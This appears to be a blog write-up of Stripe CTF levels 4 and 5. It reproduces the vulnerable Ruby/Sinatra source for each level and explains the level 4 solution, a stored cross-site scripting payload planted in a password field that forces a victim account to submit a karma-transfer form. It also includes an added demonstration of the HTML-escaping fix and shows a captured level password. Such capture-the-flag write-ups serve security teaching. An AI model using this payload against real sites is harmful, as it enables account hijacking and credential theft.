<a name="n68" href="https://stripe-ctf.com/levels/4#n68"></a>68
<a name="n69" href="https://stripe-ctf.com/levels/4#n69"></a>69
<strong><a name="n70" href="https://stripe-ctf.com/levels/4#n70"></a>70</strong>
<a name="n71" href="https://stripe-ctf.com/levels/4#n71"></a>71
<a name="n72" href="https://stripe-ctf.com/levels/4#n72"></a>72
<a name="n73" href="https://stripe-ctf.com/levels/4#n73"></a>73
<a name="n74" href="https://stripe-ctf.com/levels/4#n74"></a>74
<a name="n75" href="https://stripe-ctf.com/levels/4#n75"></a>75
<a name="n76" href="https://stripe-ctf.com/levels/4#n76"></a>76
<a name="n77" href="https://stripe-ctf.com/levels/4#n77"></a>77
<a name="n78" href="https://stripe-ctf.com/levels/4#n78"></a>78
<a name="n79" href="https://stripe-ctf.com/levels/4#n79"></a>79
</pre>
</td>
<td>
<pre>#!/usr/bin/env ruby
require 'yaml'
require 'set'

require 'rubygems'
require 'bundler/setup'

require 'sequel'
require 'sinatra'

module KarmaTrader
  PASSWORD = File.read('password.txt').strip
  STARTING_KARMA = 500
  KARMA_FOUNTAIN = 'karma_fountain'

  # Only needed in production
  URL_ROOT = File.read('url_root.txt').strip rescue ''

  module DB
    def self.db_file
      'karma.db'
    end

    def self.conn
      @conn ||= Sequel.sqlite(db_file)
    end

    def self.init
      return if File.exists?(db_file)
      File.umask(0066)

      conn.create_table(:users) do
        primary_key :id
        String :username
        String :password
        Integer :karma
        Time :last_active
      end

      conn.create_table(:transfers) do
        primary_id :id
        String :from
        String :to
        Integer :amount
      end

      # Karma Fountain has infinite karma, so just set it to -1
      conn[:users].insert(
        :username =&gt; KarmaTrader::KARMA_FOUNTAIN,
        :password =&gt; KarmaTrader::PASSWORD,
        :karma =&gt; -1,
        :last_active =&gt; Time.now.utc
        )
    end
  end

  class KarmaSrv &lt; Sinatra::Base
    set :environment, :production
    enable :sessions

    # Use persistent entropy file
    entropy_file = 'entropy.dat'
    unless File.exists?(entropy_file)
      File.open(entropy_file, 'w') do |f|
        f.write(OpenSSL::Random.random_bytes(24))
      end
    end
    set :session_secret, File.read(entropy_file)

    helpers do
      def absolute_url(path)
        KarmaTrader::URL_ROOT + path
      end
    end

    # Hack to make this work with a URL root
    def redirect(url)
      super(absolute_url(url))
    end

    def die(msg, view)
      @error = msg
      halt(erb(view))
    end

    before do
      refresh_state
      update_last_active
    end

    def refresh_state
      @user = logged_in_user
      @transfers = transfers_for_user
      @trusts_me = trusts_me
      @registered_users = registered_users
    end

    def update_last_active
      return unless @user
      DB.conn[:users].where(:username =&gt; @user[:username]).
        update(:last_active =&gt; Time.now.utc)
    end

    def logged_in_user
      return unless username = session[:user]
      DB.conn[:users][:username =&gt; username]
    end

    def transfers_for_user
      return [] unless @user

      DB.conn[:transfers].where(
        Sequel.or(:from =&gt; @user[:username], :to =&gt; @user[:username])
        )
    end

    def trusts_me
      trusts_me = Set.new
      return trusts_me unless @user

      # Get all the users who have transferred credits to me
      DB.conn[:transfers].where(:to =&gt; @user[:username]).
        join(:users, :username =&gt; :from).each do |result|
        trusts_me.add(result[:username])
      end

      trusts_me
    end

    def registered_users
      KarmaTrader::DB.conn[:users].reverse_order(:id)
    end

    # KARMA_FOUNTAIN gets all the karma it wants. (Part of why getting
    # its password would be so great...)
    def user_has_infinite_karma?
      @user[:username] == KARMA_FOUNTAIN
    end

    get '/' do
      if @user
        erb :home
      else
        erb :login
      end
    end

    get '/register' do
      erb :register
    end

    post '/register' do
      username = params[:username]
      password = params[:password]
      unless username &amp;&amp; password
        die("Please specify both a username and a password.", :register)
      end

      # Note: in Ruby, ^ and $ match at line boundaries; \A and \z anchor
      # the whole string.
      unless username =~ /^\w+$/
        die('Invalid username. Usernames must match /^\w+$/', :register)
      end

      unless DB.conn[:users].where(:username =&gt; username).count == 0
        die("This username is already registered. Try another one.",
            :register)
      end

      # The password is stored verbatim and is later interpolated into
      # views/home.erb with &lt;%= %&gt;, which does not HTML-escape.
      DB.conn[:users].insert(
        :username =&gt; username,
        :password =&gt; password,
        :karma =&gt; STARTING_KARMA,
        :last_active =&gt; Time.now.utc
        )
      session[:user] = username
      redirect '/'
    end

    get '/login' do
      redirect '/'
    end

    post '/login' do
      username = params[:username]
      password = params[:password]
      user = DB.conn[:users][:username =&gt; username, :password =&gt; password]
      unless user
        die('Could not authenticate. Perhaps you meant to register a new' \
            ' account? (See link below.)', :login)
      end

      session[:user] = user[:username]
      redirect '/'
    end

    get '/transfer' do
      redirect '/'
    end

    post '/transfer' do
      redirect '/' unless @user

      from = @user[:username]
      to = params[:to]
      amount = params[:amount]

      die("Please fill out all the fields.", :home) unless amount &amp;&amp; to
      amount = amount.to_i
      die("Invalid amount specified.", :home) if amount &lt;= 0
      die("You cannot send yourself karma!", :home) if to == from
      unless DB.conn[:users][:username =&gt; to]
        die("No user with username #{to.inspect} found.", :home)
      end

      unless user_has_infinite_karma?
        if @user[:karma] &lt; amount
          die("You only have #{@user[:karma]} karma left.", :home)
        end
      end

      DB.conn[:transfers].insert(:from =&gt; from, :to =&gt; to, :amount =&gt; amount)
      DB.conn[:users].where(:username=&gt;from).update(:karma =&gt; :karma - amount)
      DB.conn[:users].where(:username=&gt;to).update(:karma =&gt; :karma + amount)

      refresh_state
      @success = "You successfully transfered #{amount} karma to" +
                 " #{to.inspect}."
      erb :home
    end

    get '/logout' do
      session.clear
      redirect '/'
    end
  end
end

def main
  KarmaTrader::DB.init
  KarmaTrader::KarmaSrv.run!
end

if $0 == __FILE__
  main
  exit(0)
end</pre>
</td>
</tr>
</tbody>
</table>
The contents of <code>views/home.erb</code>:
<table>
<tbody>
<tr>
<td>
<pre>&lt;h1&gt;Welcome to Karma Trader!&lt;/h1&gt;

&lt;h3&gt;Home&lt;/h3&gt;
&lt;p&gt;You are logged in as &lt;%= @user[:username] %&gt;.&lt;/p&gt;

&lt;h3&gt;Transfer karma&lt;/h3&gt;
&lt;p&gt;
  You have &lt;%= @user[:karma] %&gt; karma at the moment. Transfer
  karma to people who have done good deeds and you think will keep
  doing good deeds in the future.
&lt;/p&gt;

&lt;p&gt;
  Note that transferring karma to someone will reveal your
  password to them, which will hopefully incentivize you to only
  give karma to people you really trust.
&lt;/p&gt;

&lt;p&gt;
  If you're anything like &lt;strong&gt;karma_fountain&lt;/strong&gt;, you'll find
  yourself logging in every minute to see what new and exciting
  developments are afoot on the platform. (Though no need to be as paranoid as
  &lt;strong&gt;karma_fountain&lt;/strong&gt; and firewall your outbound network connections
  so you can only make connections to the Karma Trader server itself.)
&lt;/p&gt;

&lt;p&gt;See below for a list of all registered usernames.&lt;/p&gt;
&lt;form action="&lt;%= absolute_url('/transfer') %&gt;" method="POST"&gt;
  &lt;p&gt;To: &lt;input type="to" name="to" /&gt;&lt;/p&gt;
  &lt;p&gt;Amount of karma: &lt;input type="text" name="amount" /&gt;&lt;/p&gt;
  &lt;p&gt;&lt;input type="submit" value="Submit" /&gt;&lt;/p&gt;
&lt;/form&gt;

&lt;h3&gt;Past transfers&lt;/h3&gt;
&lt;table border="1"&gt;
  &lt;tr&gt;
    &lt;th&gt;From&lt;/th&gt;
    &lt;th&gt;To&lt;/th&gt;
    &lt;th&gt;Amount&lt;/th&gt;
  &lt;/tr&gt;
  &lt;% @transfers.each do |transfer| %&gt;
  &lt;tr&gt;
    &lt;td&gt;&lt;%= transfer[:from] %&gt;&lt;/td&gt;
    &lt;td&gt;&lt;%= transfer[:to] %&gt;&lt;/td&gt;
    &lt;td&gt;&lt;%= transfer[:amount] %&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;% end %&gt;
&lt;/table&gt;

&lt;h3&gt; Registered Users &lt;/h3&gt;
&lt;ul&gt;
  &lt;% @registered_users.each do |user| %&gt;
  &lt;% last_active = user[:last_active].strftime('%H:%M:%S UTC') %&gt;
  &lt;% if @trusts_me.include?(user[:username]) %&gt;
  &lt;li&gt;
    &lt;%= user[:username] %&gt;
    (password: &lt;%= user[:password] %&gt;, last active &lt;%= last_active %&gt;)
  &lt;/li&gt;
  &lt;% elsif user[:username] == @user[:username] %&gt;
  &lt;li&gt;
    &lt;%= user[:username] %&gt;
    (&lt;strong&gt;you&lt;/strong&gt;, last active &lt;%= last_active %&gt;)
  &lt;/li&gt;
  &lt;% else %&gt;
  &lt;li&gt;
    &lt;%= user[:username] %&gt;
    (password: &lt;i&gt;[hasn't yet transferred karma to you]&lt;/i&gt;,
    last active &lt;%= last_active %&gt;)
  &lt;/li&gt;
  &lt;% end %&gt;
  &lt;% end %&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="&lt;%= absolute_url('/logout') %&gt;"&gt;Log out&lt;/a&gt;&lt;/p&gt;</pre>
</td>
</tr>
</tbody>
</table>
The contents of <code>views/login.erb</code>:
<table>
<tbody>
<tr>
<td>
<pre>&lt;h1&gt;
  Welcome to Karma Trader, the best way to reward people for good deeds!
&lt;/h1&gt;

&lt;h3&gt;Login&lt;/h3&gt;

&lt;form action="&lt;%= absolute_url('/login') %&gt;" method="POST"&gt;
  &lt;p&gt;Username: &lt;input type="text" name="username" /&gt;&lt;/p&gt;
  &lt;p&gt;Password: &lt;input type="password" name="password" /&gt;&lt;/p&gt;
  &lt;p&gt;&lt;input type="submit" value="Log in" /&gt;&lt;/p&gt;
&lt;/form&gt;

&lt;p&gt;
  Don't have an account?
  &lt;a href="&lt;%= absolute_url('/register') %&gt;"&gt;Register&lt;/a&gt; now!
&lt;/p&gt;</pre>
</td>
</tr>
</tbody>
</table>
The contents of <code>views/register.erb</code>:
<table>
<tbody>
<tr>
<td>
<pre>&lt;h1&gt;Welcome to Karma Trader, the best way to reward people for good deeds!&lt;/h1&gt;

&lt;h3&gt;Register&lt;/h3&gt;

&lt;form action="&lt;%= absolute_url('/register') %&gt;" method="POST"&gt;
  &lt;p&gt;Pick your username: &lt;input type="text" name="username" /&gt;&lt;/p&gt;
  &lt;p&gt;Choose a password: &lt;input type="password" name="password" /&gt;&lt;/p&gt;
  &lt;p&gt;&lt;input type="submit" value="Create account" /&gt;&lt;/p&gt;
&lt;/form&gt;

&lt;p&gt;Already have an account? &lt;a href="&lt;%= absolute_url('/') %&gt;"&gt;Log in&lt;/a&gt; now!&lt;/p&gt;</pre>
</td>
</tr>
</tbody>
</table>
The contents of <code>views/layout.erb</code>:
<table>
<tbody>
<tr>
<td>
<pre>&lt;!doctype html&gt;
&lt;html&gt;
  &lt;head&gt;
    &lt;title&gt;Karma Trader&lt;/title&gt;
    &lt;script type="text/javascript"
            src="&lt;%= absolute_url('/js/jquery-1.8.0.min.js') %&gt;"&gt;&lt;/script&gt;
  &lt;/head&gt;
  &lt;body&gt;
&lt;% if @error %&gt;
  &lt;p&gt;Error: &lt;%= @error %&gt;&lt;/p&gt;
&lt;% end %&gt;
&lt;% if @success %&gt;
  &lt;p&gt;Success: &lt;%= @success %&gt;&lt;/p&gt;
&lt;% end %&gt;

&lt;%= yield %&gt;
  &lt;/body&gt;
&lt;/html&gt;</pre>
</td>
</tr>
</tbody>
</table>

<strong>Solution</strong>

Well, this one&#8217;s pretty easy. The code is in Ruby and built on the Sinatra framework. It&#8217;s an application in which users can send each other karma. To ensure karma is only traded legitimately, the application shows A&#8217;s password to B as soon as A sends B karma; this way only trusted people will receive karma.

Now there&#8217;s an automated user (karma_fountain) with unlimited karma, and its password is the flag. To get that password, karma_fountain has to send you karma. Since you don&#8217;t have its password, you can&#8217;t legitimately send karma from its account to yourself, so the request has to be forged from karma_fountain&#8217;s own session (hence CSRF).

The application interface is pretty simple: a few lines of text come first, then a form for sending karma to someone, with the fields <strong>amount</strong> and <strong>to</strong>. Whoever you send karma to will be shown your password. Then there&#8217;s a table listing all transfers you have made to others and others have made to you (just for clarification: we don&#8217;t actually need this one).

Finally, there&#8217;s a list of all registered users, with their passwords shown if they have sent you karma. This last section is the part we can influence and the part karma_fountain is bound to see. We have to get our forgery script in there somehow; the script is the following, assuming our username is <strong>abx</strong>:
<blockquote>&lt;script&gt;

var x=document.forms[0];

x.to.value='abx';

x.amount.value='1';

x.submit();

&lt;/script&gt;</blockquote>
All four of these lines can go on a single line; I have separated them here for the sake of readability. The first line assigns the variable <strong>x</strong> to the first form on the page (which is the one for sending karma to other people). The second line sets its <strong>to</strong> field to my username, and the third sets some karma amount. The fourth line submits the form.

If we could somehow get karma_fountain to run this JavaScript unknowingly, we would have its password. At first I thought of creating another user with this script as the username, but that failed, since usernames must match <code>/^\w+$/</code> (letters, digits and underscore only).

Then I realized that I could set this script as the new user&#8217;s password and send some karma from that user to karma_fountain, so that karma_fountain would see (and therefore run) the script on its own page. So I created a user named <strong>screwer</strong> with the above script (on a single line) as its password, logged in and sent some karma to karma_fountain. Then I logged out and back in as <strong>abx</strong>.

I waited a minute or two (to let karma_fountain check its page) and refreshed mine. There was karma_fountain&#8217;s password at the bottom. (You can&#8217;t see the password in the following image; you have to look at the page&#8217;s source code, because the script runs while the page is rendering and cuts the rest of the output short.)
<p style="text-align: center;"><a href="http://abiusx.com/blog/wp-content/uploads/2012/08/stripe-ctf-challenge4-karma_fountain.png"><img class="size-medium wp-image-770 aligncenter" title="stripe-ctf-challenge4-karma_fountain" src="http://abiusx.com/blog/wp-content/uploads/2012/08/stripe-ctf-challenge4-karma_fountain-300x157.png" alt="stripe-ctf-challenge4-karma_fountain application" width="300" height="157" /></a></p>
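The root cause of this level is not the form but the view: <code>views/home.erb</code> writes <code>user[:password]</code> into the page with <code>&lt;%= %&gt;</code>, and Sinatra&#8217;s ERB does not HTML-escape, so whatever a user stored as a password is parsed as markup by every viewer who is shown it. The following is an added example, not part of the original post or of the Stripe CTF code. It reproduces the &#8220;Registered Users&#8221; list with Ruby&#8217;s standard-library ERB and renders it once as the original does and once with <code>ERB::Util.html_escape</code>, which is the fix. It also shows why the <code>/^\w+$/</code> username check in <code>srv.rb</code> is weaker than it looks: in Ruby, <code>^</code> and <code>$</code> are line anchors (the same behaviour the Challenge 5 note below complains about), so a value with an embedded newline still matches, while <code>\A</code> and <code>\z</code> anchor the whole string. The template, the sample users and all function names are constructed for this demonstration and are not the project&#8217;s own.

```ruby
# Added example (not part of the original post or the Stripe CTF code).
# Reproduces two weak points of the Karma Trader listing with stdlib ERB:
#   1. views/home.erb interpolates user-controlled fields with <%= %>,
#      which does not HTML-escape under Sinatra;
#   2. the /^\w+$/ username check is line-anchored in Ruby.
# Template, sample rows and function names are constructed for this demo.
require 'erb'
require 'set'

# Template mirroring the "Registered Users" list of views/home.erb.
# `esc` is supplied by the caller: an identity lambda reproduces the
# original behaviour, ERB::Util.html_escape is the fix.
USER_LIST_TEMPLATE = <<~'TPL'
  <ul>
  <% users.each do |user| %>
  <% if trusts_me.include?(user[:username]) %>
  <li><%= esc.call(user[:username]) %> (password: <%= esc.call(user[:password]) %>)</li>
  <% else %>
  <li><%= esc.call(user[:username]) %> (password: <i>[hasn't yet transferred karma to you]</i>)</li>
  <% end %>
  <% end %>
  </ul>
TPL

# Constructed sample rows, shaped like the :users table in srv.rb.
# The second user's "password" is an inert script canary, not a payload.
SAMPLE_USERS = [
  { username: 'karma_fountain', password: 'FLAG-PLACEHOLDER' },
  { username: 'screwer',        password: '<script>canary()</script>' }
].freeze

# Render the list as the viewer sees it. `trusts_me` is the set of users
# who have sent karma to the viewer, as in KarmaSrv#trusts_me.
def render_user_list(users, trusts_me, escape: true)
  esc = escape ? ERB::Util.method(:html_escape) : ->(s) { s.to_s }
  ERB.new(USER_LIST_TEMPLATE).result_with_hash(users: users, trusts_me: trusts_me, esc: esc)
end

# True when the rendered HTML contains an active <script> element, i.e.
# stored data reached the page as markup instead of as text.
def script_reaches_page?(html)
  html.match?(%r{<script\b}i)
end

# Registration check exactly as written in srv.rb. In Ruby ^ and $ are
# line anchors, so a value containing a newline still passes.
def username_ok_line_anchored?(name)
  name.match?(/^\w+$/)
end

# The same check with whole-string anchors, which is what was intended.
def username_ok?(name)
  name.match?(/\A\w+\z/)
end

if $0 == __FILE__
  viewer_trusts = Set['screwer']   # screwer has transferred karma to the viewer
  puts '--- as rendered by the original view (unescaped) ---'
  puts render_user_list(SAMPLE_USERS, viewer_trusts, escape: false)
  puts '--- with ERB::Util.html_escape ---'
  puts render_user_list(SAMPLE_USERS, viewer_trusts, escape: true)
  multiline = "abx\nnot-a-word"
  puts "line-anchored check accepts #{multiline.inspect}: #{username_ok_line_anchored?(multiline)}"
  puts "whole-string check accepts #{multiline.inspect}: #{username_ok?(multiline)}"
end
```

In the unescaped rendering the canary arrives in the page as a real <code>&lt;script&gt;</code> element, exactly the condition the write-up relies on; with <code>ERB::Util.html_escape</code> it arrives as the text <code>&amp;lt;script&amp;gt;</code> and the browser never executes it. Note that escaping in the view is the fix regardless of what registration validates, because the password field is never validated at all in <code>srv.rb</code>.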
<h3><strong>Challenge 5 &#8211; Chain Request Manipulation</strong></h3>
You completed this level in 6528.572 seconds. The password was <code>ZEAorpaRyV</code>.

The solution you submitted was:

<code>I was stuck here for 2 hours only cuz i didnt know default Ruby regex is not multiline, as is in PHP.</code>

<hr />

Many attempts have been made at creating a federated identity system for the web (see <a href="http://openid.net/">OpenID</a>, for example). However, none of them have been successful. Until today.

The DomainAuthenticator is based on a novel protocol for establishing identities. To authenticate to a site, you simply provide it a username, password, and pingback URL. The site posts your credentials to the pingback URL, which returns either &#8220;AUTHENTICATED&#8221; or &#8220;DENIED&#8221;. If &#8220;AUTHENTICATED&#8221;, the site considers you signed in as a user for the pingback domain.

You can check out the Stripe CTF DomainAuthenticator instance here:<strong><a href="https://level05-2.stripe-ctf.com/user-ttjzfipuud" target="_blank">https://level05-2.stripe-ctf.com/user-ttjzfipuud</a></strong>. We&#8217;ve been using it to distribute the password to access Level 6. If you could only somehow authenticate as a user of a level05 machine&#8230;

To avoid nefarious exploits, the machine hosting the DomainAuthenticator has very locked down network access. It can only make outbound requests to other <code>stripe-ctf.com</code> servers. Though, you&#8217;ve heard that someone forgot to internally firewall off the high ports from the Level 2 server.

Interested in setting up your own DomainAuthenticator? You can grab the source from <code>git clone https://level05-2.stripe-ctf.com/user-ttjzfipuud/level05-code</code>, or by reading on below.

The contents of <code>srv.rb</code>:
<table>
<tbody>
<tr>
<td title="double click to toggle">
<pre><a name="n1" href="https://stripe-ctf.com/levels/5#n1"></a>1
<a name="n2" href="https://stripe-ctf.com/levels/5#n2"></a>2
<a name="n3" href="https://stripe-ctf.com/levels/5#n3"></a>3
<a name="n4" href="https://stripe-ctf.com/levels/5#n4"></a>4
<a name="n5" href="https://stripe-ctf.com/levels/5#n5"></a>5
<a name="n6" href="https://stripe-ctf.com/levels/5#n6"></a>6
<a name="n7" href="https://stripe-ctf.com/levels/5#n7"></a>7
<a name="n8" href="https://stripe-ctf.com/levels/5#n8"></a>8
<a name="n9" href="https://stripe-ctf.com/levels/5#n9"></a>9
<strong><a name="n10" href="https://stripe-ctf.com/levels/5#n10"></a>10</strong>
<a name="n11" href="https://stripe-ctf.com/levels/5#n11"></a>11
<a name="n12" href="https://stripe-ctf.com/levels/5#n12"></a>12
<a name="n13" href="https://stripe-ctf.com/levels/5#n13"></a>13
<a name="n14" href="https://stripe-ctf.com/levels/5#n14"></a>14
<a name="n15" href="https://stripe-ctf.com/levels/5#n15"></a>15
<a name="n16" href="https://stripe-ctf.com/levels/5#n16"></a>16
<a name="n17" href="https://stripe-ctf.com/levels/5#n17"></a>17
<a name="n18" href="https://stripe-ctf.com/levels/5#n18"></a>18
<a name="n19" href="https://stripe-ctf.com/levels/5#n19"></a>19
<strong><a name="n20" href="https://stripe-ctf.com/levels/5#n20"></a>20</strong>
<a name="n21" href="https://stripe-ctf.com/levels/5#n21"></a>21
<a name="n22" href="https://stripe-ctf.com/levels/5#n22"></a>22
<a name="n23" href="https://stripe-ctf.com/levels/5#n23"></a>23
<a name="n24" href="https://stripe-ctf.com/levels/5#n24"></a>24
<a name="n25" href="https://stripe-ctf.com/levels/5#n25"></a>25
<a name="n26" href="https://stripe-ctf.com/levels/5#n26"></a>26
<a name="n27" href="https://stripe-ctf.com/levels/5#n27"></a>27
<a name="n28" href="https://stripe-ctf.com/levels/5#n28"></a>28
<a name="n29" href="https://stripe-ctf.com/levels/5#n29"></a>29
<strong><a name="n30" href="https://stripe-ctf.com/levels/5#n30"></a>30</strong>
<a name="n31" href="https://stripe-ctf.com/levels/5#n31"></a>31
<a name="n32" href="https://stripe-ctf.com/levels/5#n32"></a>32
<a name="n33" href="https://stripe-ctf.com/levels/5#n33"></a>33
<a name="n34" href="https://stripe-ctf.com/levels/5#n34"></a>34
<a name="n35" href="https://stripe-ctf.com/levels/5#n35"></a>35
<a name="n36" href="https://stripe-ctf.com/levels/5#n36"></a>36
<a name="n37" href="https://stripe-ctf.com/levels/5#n37"></a>37
<a name="n38" href="https://stripe-ctf.com/levels/5#n38"></a>38
<a name="n39" href="https://stripe-ctf.com/levels/5#n39"></a>39
<strong><a name="n40" href="https://stripe-ctf.com/levels/5#n40"></a>40</strong>
<a name="n41" href="https://stripe-ctf.com/levels/5#n41"></a>41
<a name="n42" href="https://stripe-ctf.com/levels/5#n42"></a>42
<a name="n43" href="https://stripe-ctf.com/levels/5#n43"></a>43
<a name="n44" href="https://stripe-ctf.com/levels/5#n44"></a>44
<a name="n45" href="https://stripe-ctf.com/levels/5#n45"></a>45
<a name="n46" href="https://stripe-ctf.com/levels/5#n46"></a>46
<a name="n47" href="https://stripe-ctf.com/levels/5#n47"></a>47
<a name="n48" href="https://stripe-ctf.com/levels/5#n48"></a>48
<a name="n49" href="https://stripe-ctf.com/levels/5#n49"></a>49
<strong><a name="n50" href="https://stripe-ctf.com/levels/5#n50"></a>50</strong>
<a name="n51" href="https://stripe-ctf.com/levels/5#n51"></a>51
<a name="n52" href="https://stripe-ctf.com/levels/5#n52"></a>52
<a name="n53" href="https://stripe-ctf.com/levels/5#n53"></a>53
<a name="n54" href="https://stripe-ctf.com/levels/5#n54"></a>54
<a name="n55" href="https://stripe-ctf.com/levels/5#n55"></a>55
<a name="n56" href="https://stripe-ctf.com/levels/5#n56"></a>56
<a name="n57" href="https://stripe-ctf.com/levels/5#n57"></a>57
<a name="n58" href="https://stripe-ctf.com/levels/5#n58"></a>58
<a name="n59" href="https://stripe-ctf.com/levels/5#n59"></a>59
<strong><a name="n60" href="https://stripe-ctf.com/levels/5#n60"></a>60</strong>
<a name="n61" href="https://stripe-ctf.com/levels/5#n61"></a>61
<a name="n62" href="https://stripe-ctf.com/levels/5#n62"></a>62
<a name="n63" href="https://stripe-ctf.com/levels/5#n63"></a>63
<a name="n64" href="https://stripe-ctf.com/levels/5#n64"></a>64
<a name="n65" href="https://stripe-ctf.com/levels/5#n65"></a>65
<a name="n66" href="https://stripe-ctf.com/levels/5#n66"></a>66
<a name="n67" href="https://stripe-ctf.com/levels/5#n67"></a>67
<a name="n68" href="https://stripe-ctf.com/levels/5#n68"></a>68
<a name="n69" href="https://stripe-ctf.com/levels/5#n69"></a>69
<strong><a name="n70" href="https://stripe-ctf.com/levels/5#n70"></a>70</strong>
<a name="n71" href="https://stripe-ctf.com/levels/5#n71"></a>71
<a name="n72" href="https://stripe-ctf.com/levels/5#n72"></a>72
<a name="n73" href="https://stripe-ctf.com/levels/5#n73"></a>73
<a name="n74" href="https://stripe-ctf.com/levels/5#n74"></a>74
<a name="n75" href="https://stripe-ctf.com/levels/5#n75"></a>75
<a name="n76" href="https://stripe-ctf.com/levels/5#n76"></a>76
<a name="n77" href="https://stripe-ctf.com/levels/5#n77"></a>77
<a name="n78" href="https://stripe-ctf.com/levels/5#n78"></a>78
<a name="n79" href="https://stripe-ctf.com/levels/5#n79"></a>79
<strong><a name="n80" href="https://stripe-ctf.com/levels/5#n80"></a>80</strong>
<a name="n81" href="https://stripe-ctf.com/levels/5#n81"></a>81
<a name="n82" href="https://stripe-ctf.com/levels/5#n82"></a>82
<a name="n83" href="https://stripe-ctf.com/levels/5#n83"></a>83
<a name="n84" href="https://stripe-ctf.com/levels/5#n84"></a>84
<a name="n85" href="https://stripe-ctf.com/levels/5#n85"></a>85
<a name="n86" href="https://stripe-ctf.com/levels/5#n86"></a>86
<a name="n87" href="https://stripe-ctf.com/levels/5#n87"></a>87
<a name="n88" href="https://stripe-ctf.com/levels/5#n88"></a>88
<a name="n89" href="https://stripe-ctf.com/levels/5#n89"></a>89
<strong><a name="n90" href="https://stripe-ctf.com/levels/5#n90"></a>90</strong>
<a name="n91" href="https://stripe-ctf.com/levels/5#n91"></a>91
<a name="n92" href="https://stripe-ctf.com/levels/5#n92"></a>92
<a name="n93" href="https://stripe-ctf.com/levels/5#n93"></a>93
<a name="n94" href="https://stripe-ctf.com/levels/5#n94"></a>94
<a name="n95" href="https://stripe-ctf.com/levels/5#n95"></a>95
<a name="n96" href="https://stripe-ctf.com/levels/5#n96"></a>96
<a name="n97" href="https://stripe-ctf.com/levels/5#n97"></a>97
<a name="n98" href="https://stripe-ctf.com/levels/5#n98"></a>98
<a name="n99" href="https://stripe-ctf.com/levels/5#n99"></a>99
<strong><a name="n100" href="https://stripe-ctf.com/levels/5#n100"></a>100</strong>
<a name="n101" href="https://stripe-ctf.com/levels/5#n101"></a>101
<a name="n102" href="https://stripe-ctf.com/levels/5#n102"></a>102
<a name="n103" href="https://stripe-ctf.com/levels/5#n103"></a>103
<a name="n104" href="https://stripe-ctf.com/levels/5#n104"></a>104
<a name="n105" href="https://stripe-ctf.com/levels/5#n105"></a>105
<a name="n106" href="https://stripe-ctf.com/levels/5#n106"></a>106
<a name="n107" href="https://stripe-ctf.com/levels/5#n107"></a>107
<a name="n108" href="https://stripe-ctf.com/levels/5#n108"></a>108
<a name="n109" href="https://stripe-ctf.com/levels/5#n109"></a>109
<strong><a name="n110" href="https://stripe-ctf.com/levels/5#n110"></a>110</strong>
<a name="n111" href="https://stripe-ctf.com/levels/5#n111"></a>111
<a name="n112" href="https://stripe-ctf.com/levels/5#n112"></a>112
<a name="n113" href="https://stripe-ctf.com/levels/5#n113"></a>113
<a name="n114" href="https://stripe-ctf.com/levels/5#n114"></a>114
<a name="n115" href="https://stripe-ctf.com/levels/5#n115"></a>115
<a name="n116" href="https://stripe-ctf.com/levels/5#n116"></a>116
<a name="n117" href="https://stripe-ctf.com/levels/5#n117"></a>117
<a name="n118" href="https://stripe-ctf.com/levels/5#n118"></a>118
<a name="n119" href="https://stripe-ctf.com/levels/5#n119"></a>119
<strong><a name="n120" href="https://stripe-ctf.com/levels/5#n120"></a>120</strong>
<a name="n121" href="https://stripe-ctf.com/levels/5#n121"></a>121
<a name="n122" href="https://stripe-ctf.com/levels/5#n122"></a>122</pre>
</td>
<td>
<pre>#!/usr/bin/env ruby
require 'rubygems'
require 'bundler/setup'

require 'logger'
require 'uri'

require 'restclient'
require 'sinatra'

$log = Logger.new(STDERR)
$log.level = Logger::INFO

module DomainAuthenticator
  class DomainAuthenticatorSrv &lt; Sinatra::Base
    set :environment, :production

    # Run with the production file on the server
    if File.exists?('production')
      PASSWORD_HOSTS = /^level05-\d+\.stripe-ctf\.com$/
      ALLOWED_HOSTS = /\.stripe-ctf\.com$/
    else
      PASSWORD_HOSTS = /^localhost$/
      ALLOWED_HOSTS = //
    end
    PASSWORD = File.read('password.txt').strip
    enable :sessions

    # Use persistent entropy file
    entropy_file = 'entropy.dat'
    unless File.exists?(entropy_file)
      File.open(entropy_file, 'w') do |f|
        f.write(OpenSSL::Random.random_bytes(24))
      end
    end
    set :session_secret, File.read(entropy_file)

    get '/*' do
      output = &lt;&lt;EOF
&lt;p&gt;
  Welcome to the Domain Authenticator. Please authenticate as a user from
  your domain of choice.
&lt;/p&gt;

&lt;form action="" method="POST"&gt;
&lt;p&gt;Pingback URL: &lt;input type="text" name="pingback" /&gt;&lt;/p&gt;
&lt;p&gt;Username: &lt;input type="text" name="username" /&gt;&lt;/p&gt;
&lt;p&gt;Password: &lt;input type="password" name="password" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;input type="submit" value="Submit"&gt;&lt;/p&gt;
&lt;/form&gt;
EOF

      user = session[:auth_user]
      host = session[:auth_host]
      if user &amp;&amp; host
        output += "&lt;p&gt; You are authenticated as #{user}@#{host}. &lt;/p&gt;"
        if host =~ PASSWORD_HOSTS
          output += "&lt;p&gt; Since you're a user of a password host and all,"
          output += " you deserve to know this password: #{PASSWORD} &lt;/p&gt;"
        end
      end

      output
    end

    post '/*' do
      pingback = params[:pingback]
      username = params[:username]
      password = params[:password]

      pingback = "http://#{pingback}" unless pingback.include?('://')

      host = URI.parse(pingback).host
      unless host =~ ALLOWED_HOSTS
        return "Host not allowed: #{host}" \
               " (allowed authentication hosts are #{ALLOWED_HOSTS.inspect})"
      end

      begin
        body = perform_authenticate(pingback, username, password)
      rescue StandardError =&gt; e
        return "An unknown error occurred while requesting #{pingback}: #{e}"
      end

      if authenticated?(body)
        session[:auth_user] = username
        session[:auth_host] = host
        return "Remote server responded with: #{body}." \
               " Authenticated as #{username}@#{host}!"
      else
        session[:auth_user] = nil
        session[:auth_host] = nil
        sleep(1) # prevent abuse
        return "Remote server responded with: #{body}." \
               " Unable to authenticate as #{username}@#{host}."
      end
    end

    def perform_authenticate(url, username, password)
      $log.info("Sending request to #{url}")
      response = RestClient.post(url, {:password =&gt; password,
                                       :username =&gt; username})
      body = response.body

      $log.info("Server responded with: #{body}")
      body
    end

    def authenticated?(body)
      body =~ /[^\w]AUTHENTICATED[^\w]*$/
    end
  end
end

def main
  DomainAuthenticator::DomainAuthenticatorSrv.run!
end

if $0 == __FILE__
  main
  exit(0)
end</pre>
</td>
</tr>
</tbody>
</table>

<strong>Solution</strong>

